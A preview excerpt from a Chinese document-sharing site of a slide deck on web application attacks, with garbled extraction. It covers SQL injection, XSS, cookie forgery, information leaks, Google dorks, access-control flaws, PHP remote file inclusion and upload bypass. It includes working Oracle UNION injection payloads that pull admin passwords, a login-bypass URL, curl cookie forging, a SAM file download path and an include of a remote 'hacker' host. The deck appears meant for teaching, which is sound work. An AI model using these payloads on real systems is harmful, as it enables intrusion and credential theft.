web应用攻击技术_第1页
web应用攻击技术_第2页
web应用攻击技术_第3页
web应用攻击技术_第4页
web应用攻击技术_第5页
已阅读5页,还剩64页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、目录目录十大WEB应用安全漏洞SQL注入XSS跨站表单绕过Cookies欺骗信息泄露GoogleHacking访问控制错误PHP特有漏洞攻击变量滥用文件包含上传漏洞攻击网页篡改、挂马其他SQL注入(SQL injection)跨站脚本攻击恶意代码已知弱点和错误配置隐藏字段后门和调试漏洞参数篡改更改cookie输入信息控制缓冲区溢出十大常见的十大常见的WEBWEB应用攻击应用攻击SQLSQL注入注入技术技术概述概述就攻击技术本质而言,它利用的工具是SQL的语法,针对的是应用程序开发者编程中的漏洞,当攻击者能操作数据,向应用程序中插入一些SQL语句时,SQL Injection攻击就发生了。实际上

2、,SQL Injection攻击是存在于常见的多连接的应用程序中的一种漏洞,攻击者通过在应用程序预先定义好的SQL语句结尾加上额外的SQL语句元素,欺骗数据库服务器执行非授权的任意查询,篡改和命令执行。 就风险而言,SQL Injection攻击也是位居前列,和缓冲区溢出漏洞相比,其优势在于能够轻易的绕过防火墙直接访问数据库,甚至能够获得数据库所在的服务器的系统权限。在Web应用漏洞中,SQL Injection 漏洞的风险要高过其他所有的漏洞。安全安全风险风险攻击特点攻击特点攻击的广泛性:由于其利用的是SQL语法,使得攻击普遍存在;攻击代码的多样性:由于各种数据库软件及应用程序有其自身的特点

3、,实际的攻击代码可能不尽相同;影响范围影响范围数据库:MS-Sql Server、Oracle、Mysql、DB2、Informix等所有基于SQL语言标准的数据库软件;应用程序:ASP、PHP,JSP、CGI、CFM等所有应用程序;简单的SQL Injection攻击(1)假设的登录查询 SELECT * FROM users WHERE login = victorAND password = 123假设的ASP代码var sql = SELECT * FROM usersWHERE login = + formusr + AND password = + formpwd + ;简单的SQ

4、L Injection攻击(2)输入字符formusr = or 1=1 formpwd = anything实际的查询代码SELECT * FROM usersWHERE username = or 1=1 AND password = anything -是结束符,后面变成注释,导致此SQL语句恒成立,可以登陆后台SQLSQL注入攻击过程演示注入攻击过程演示(1)(1)手动注入手动注入发现注入点发现注入点发现产品展示的URL链接,提交单引号立即报错用经典的and 1=1测试返回正常,用and 1=2返回不正常, 存在注入漏洞用经典的and 1=1测试返回正常,用and 1=2返回不正常,

5、存在注入漏洞Select * from user where id=123String id =request.getParameter(“id”);String sql = SELECT * FROM user WHERE id = + id; 判断数据库类型根据入侵经验该系统的后台可能为ORACLE数据库Dual这个表是ORACLE数据库特有的, 看下它是否存在,如果存在就说明数据库为ORACLE。提交:And 0(select count(*) from dual),返回正常页面字段猜解猜解字段数量并构造查询语句And%201=1%20union%20select%20null,null

6、,null,null,null,null,null,null,null,null from dual页面返回正常,查询语句语法正确检测字段类型and%201=1%20union%20select%20null,null,null,null,null,null,null,null,null,null%20from%20dual在第3 ,4,7,8,9,10位置加上 单引号均返回正常页面,字段是字符型查询ORACLE数据库的版本and%20%201=2%20union%20select%20null,null,(select%20banner%20from%20sys.v_$version%20w

7、here%20rownum=1),null,null,null,null,null,null,null%20from%20dual-查询当前连接用户and%20%201=2%20union%20select%20null,null,(select%20SYS_CONTEXT%20(USERENV,%20CURRENT_USER)%20from%20dual),null,null,null,null,null,null,null%20from%20dual-爆出当前连接用户为TOUR查询数据库中所有表名and%20%201=2%20union%20select%20null,null,TABLE

8、_NAME,null,null,null,null,null,null,null%20from%20USER_TABLES-成功获取表名其中敏感表名包括ADMIN ABOUT CONFIG MASTER查询字段and%20%201=2%20union%20select%20null,null,name,null,null,null,null,null,null,null%20from%20master-获取ADMIN中的用户名and%20%201=2%20union%20select%20null,null,password,null,null,null,null,null,null,null

9、%20from%20master-获取ADMIN中的管理密码,MD5加密查找后台登陆地址使用得到的密码成功登陆SQLSQL注入攻击过程演示注入攻击过程演示(2)(2)cookiecookie注入注入发现注入点发现产品展示的详细信息的URL链接,在cookie里提交单引号立即报错在cookie里用%20AnD%208808%3D8808;测试返回正常,用%20AnD%208808%3D8807;返回不正常, 存在注入漏洞由于是盲注点,所以选择用工具进行检测Webscan加入当前28/09-90dbapp/products.asp?id=1339进行自动检测跨

10、站脚本攻击跨站脚本攻击80%网站存在跨站漏洞, 包括许多大型知名网站什么是跨站脚本攻击跨站攻击的危害跨站漏洞的检测与攻击手段 跨站脚本漏洞产生原理由于WEB应用程序没有对用户的输入和输出进行严格的过滤和转换,就导致在返回页面中可能嵌入恶意代码。什么是跨站脚本攻击XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往WEB页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。跨站脚本执行漏洞的攻击效果需要借助第三方网站来显现,因此这种攻击能在一定程度上隐藏身份。XSS属于被动式的攻击,因为其被

11、动且不好利用,所以许多人常呼略其危害性。跨站脚本攻击传播途径EMAILIM聊天室留言板论坛 交互性平台编写Cookie收集脚本cookie.asp 生成恶意URL诱骗用户点击国外收集国外收集xssxss的站的站利用跨站获取COOKIE跨站漏洞演示跨站攻击的危害窃取 Cookie 劫持帐户 执行 ActiveX 执行 Flash 内容 强迫您下载软件对硬盘和数据采取操作 XSS挂马SNS和Web2.0网站的发展,让交互性更的更强。SQL注入减少,XSS将慢慢抬头,利用方式也变多。表单绕过漏洞表单绕过漏洞漏洞介绍在登陆表单可以使用一些特殊字符绕过对合法用户的认证体系,并且拥有合法用户的权限漏洞成因

12、对用户输入的字符未做安全性检测,它属于特殊的SQL注入。问题代码(ASP+ORACLE)username=Request(username)userpassword=md5(replace(trim(request(userpassword),)存在SQL注入之表单绕过的URL28/09-90dbapp/userinfo/user_checklogin.asp?username=admin%27-&userpassword=1111&imageField=%B5%C7+%C2%BD只要在登陆页面/userinfo/login.asp中。将用

13、户名输入:Admin-;密码输入:任何字符点击登陆,并提交,即可拥有管理员权限存在SQL注入之表单绕过的URLCookieCookie欺骗漏洞欺骗漏洞漏洞介绍利用工具修改客户端的Cookie欺骗服务器端的WEB程序漏洞成因WEB程序使用明文CookieWEB程序仅仅使用Cookie进行身份验证文件型Cookie欺骗保存在硬盘上会话型Cookie欺骗保存在内存中文件型文件型CookieCookie欺骗攻击欺骗攻击 修改硬盘上保存的Cookie 使用使用IECookieViewIECookieView修改修改 直接发送Cookie 直接使用直接使用curlcurl发送发送CookieCookie

14、curl http:/target/curl http:/target/index.phpindex.php -b admin=1 -d -b admin=1 -d other_actionother_action= =todotodo 会话型会话型CookieCookie欺骗攻击欺骗攻击 获取HTTP响应头,伪造Cookie 虚假代理,发送Cookie 获取HTTP响应头,增加cookies信息Cookie欺骗典型实例小秋个性留言本管理验证漏洞 修改cookie值loginok为任意值,即可成功管理员信息泄漏漏洞信息泄漏漏洞漏洞介绍提交特殊的错误参数,WEB服务器返回特定的详细的敏感信息漏洞

15、成因WEB程序对错误处理不严WEB服务器配置不当WEB开发和管理不当WEBWEB应用威胁应用威胁信息泄漏攻击信息泄漏攻击(1)(1)泄漏物理路径请求不存在文件猜解正确用户名输入错误用户名时,返回“该用户不存在”暴露数据库路径请求28/09-90dbapp/product.asp?tp=67暴露oracle数据库信息WEBWEB应用威胁应用威胁信息泄漏攻击信息泄漏攻击(2)(2)数据库连接的备份文件db.inc.bakGlobal.asa.bakConfig.asp.bakConn.asp.bak代码备份文件.asp.bak.asp.1www.rarWeb.

16、tar.gzbackup.sqlweb.config.bak常用目录名和文件名/admin/backup/manage/admin.asplogin.phpAdmin_login.jspGoogleHackingGoogleHacking什么是GoogleHackingGoogle Hacking是一种利用搜索引擎获取web应用程序弱点和敏感信息的手段。Google Hacking 是一种以合法的方式获取非法或未授权信息的手段Google Hacking 是所有利用搜索引擎进行攻击的一个典型基本搜索+ 把google可能忽略的字列如查询范围 - 把某个字忽略 同意词. 单一的通配符* 通配符,

17、可代表多个字母精确查询高级搜索intext 把网页中的正文内容中的某个字符做为搜索条件 intitle 搜索网页标题中某个字符做为搜索条件 cache 搜索google里关于某些内容的缓存iletype 搜索指定类型的文件(重要参数)inurl 搜索我们指定的字符是否存在于URL中site 搜索指定的网站或者域名GoogleHacking实例. .cncn filetype:incfiletype:inc filetype:mdbfiletype:mdb inurl:databaseinurl:databasefiletype:mdbfiletype:mdb Standard Jet DB“

18、Standard Jet DB“ 该站已经被入侵,HYTOP.MDB 是个木马打包源代码后的生成文件访问控制错误漏洞访问控制错误漏洞漏洞介绍敏感目录或者敏感文件权限设置不当导致被攻击者查看漏洞成因WEB程序权限设置不严格WEB程序服务器权限设置不当 上传程序无密码保护http:/target/upfile.asphttp:/target/upfile.asp 直接可以浏览目录http:/target/admin/http:/target/admin/ 下载模块下载敏感信息http:/target/down.jsp?file=c:winntrepairsamhttp:/target/down.j

19、sp?file=c:winntrepairsam 后台管理无密码保护且易猜测后台管理地址PHPPHP特有漏洞攻击特有漏洞攻击变量滥用攻击标量没有初始化远程文件包含漏洞没有检验文件是否为本地文件变量滥用攻击变量滥用攻击问题代码 自定义变量绕过验证提交http:/victim/test_1.php?auth=1远程文件包含漏洞远程文件包含漏洞问题代码?请求敏感文件请求http:/target/test_2.php?filename=/etc/passwd远程执行命令生成远程文件attack.txt,运行为http:/hacker/attack.txt,内容为请求http:/target/test_

20、2.php?filename=http:/attack/attack.txt问题代码? 请求敏感文件 请求请求http:/target/test_2.php?filename=/etc/http:/target/test_2.php?filename=/etc/passwdpasswd 远程执行命令 生成远程文件生成远程文件attack.txtattack.txt, ,运行为运行为http:/hacker/http:/hacker/attack.txtattack.txt,内容为内容为? /etc)? 请求请求http:/target/test_2.php?filename=http:/att

21、ack/http:/target/test_2.php?filename=http:/attack/attacattack.txtk.txt第三方第三方WEBWEB程序漏洞程序漏洞漏洞介绍网站使用了第三方web程序,且含有可被利用攻击的漏洞漏洞成因第三方WEB自身安全性第三方WEB程序来源的安全性WEB开发和管理不当安恒机密安恒机密. | . | 6060编辑器最大的隐患(ewebeditor,fckeditor)交互平台BBSBLOG管理后台phpMyAdminTomcat/WebLogic上传欺骗漏洞上传欺骗漏洞漏洞介绍利用上传信息,绕过上传文件安全控制漏洞成因对上传文件无安全过滤对上传文

22、件安全控制不严上传欺骗漏洞上传欺骗漏洞常见绕过仅本地javascript安全控制检测文件格式类型varvar fileextfileext=document.form1.UpFile.value.substring(do=document.form1.UpFile.value.substring(document.form1.UpFile.value.lastIndexOf(.),documcument.form1.UpFile.value.lastIndexOf(.),document.form1.UpFile.value.length)ent.form1.UpFile.value.leng

23、th)fileextfileext= =fileext.toLowerCasefileext.toLowerCase()() if ( if (fileextfileext!=.jpg) & (!=.jpg) & (fileextfileext!=.gif) & !=.gif) & ( (fileextfileext!=.jpeg) & (!=.jpeg) & (fileextfileext!=.!=.pngpng) & ) & ( (fileextfileext!=.bmp)!=.bmp) alert( alert(对不起,系统仅支持标准格式的照片对不起,系统仅支持标准格式的照片,请您调整格式后重新上传,谢谢,请您调整格式后重新上

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论